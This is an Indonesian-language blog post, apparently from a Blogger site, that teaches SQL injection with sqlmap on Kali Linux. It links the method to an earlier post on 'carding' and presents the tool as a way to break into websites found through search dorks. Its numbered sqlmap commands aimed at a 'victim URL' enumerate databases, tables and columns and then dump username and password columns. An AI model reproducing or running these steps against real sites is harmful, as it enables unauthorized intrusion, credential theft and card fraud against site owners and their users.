Sql Injection Mengunakan Sqlmap Kali Linux

Yuuuu Selamat malam semua mata mulai tak bisa bergerak tapi tangan masih saja mengetik , jiah malah curcol, langsung aja kemarin kita sudah bahas carding mengunakan yang nama nya SQLi Dumper , Havij itu semua ada diwindows, ada 1 lagi tools yang saya senang mengunakan nya nama nya SQL Map , Sql Map merupakan Sql Injection yang ada di linux tetapi sekarang sudah ada di windows,

apa yang membuat saya senang dengan Sql Map? Sql Map ini ketika kita memasukan url website yang ingin kita bobol ia akan mencoba semaksimal mungkin dan dengan segala cara. ini bisa di bilang 80 % dari hasil scaner exploint bisa di bobol disini, beda dengan tool yang lain hanya rata rata 40-60% saja (INI SEMUA TERGANTUNG DORK) .

Tetapi semua tools memiliki kekurangan begitu pula SqlMap ini, Sqlmap hnya bisa menjalan kan 1 x proses saja , misal nya ketika kita sedang membuka table user, secara bersamaan kita tidak dapat membuka tabel admin, kita harus membuka nya satu satu, atau bisa dengan beda terminal pokok nya 1 proses 1 table atau 1 colom dah gitu

Untuk downlad sqlmap di windows bisa disini , karena sqlmap di windows mengunakan bahsa python kalian bisa download python disini a



  1. Buka terminal Linux dan ketikan sqlmap -u url korban --dbs
  2.  Maka Akan Muncul list database yang ada di web tersebut
  3. Kemudian ketikan lagi sqlmap -u url korban -D dbkorban --tables

  4.  Maka akan muncul lagi daftar table yang ada di database tersebut
     
  5. nah disini kita pilih table mna yang ingin kita buka contoh users, ketikan perintahsqlmap -u url korban -D dbkorban -T users --columns , maka akan muncul daftar colom yang ada di table itu
     
  6. Lalu pilih data mana yang mau kita dump atau kita ambil sqlmap -u url korban -D dbkorban -T users -C userName,userPass --dumps 
     
    Nah begitu lah cara nya selebih nya explorasi sendiri kalau mau bertanya bisa di coment saja
    untuk lebih jelas bisa lihat video di bawah

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment

0 komentar:

Posting Komentar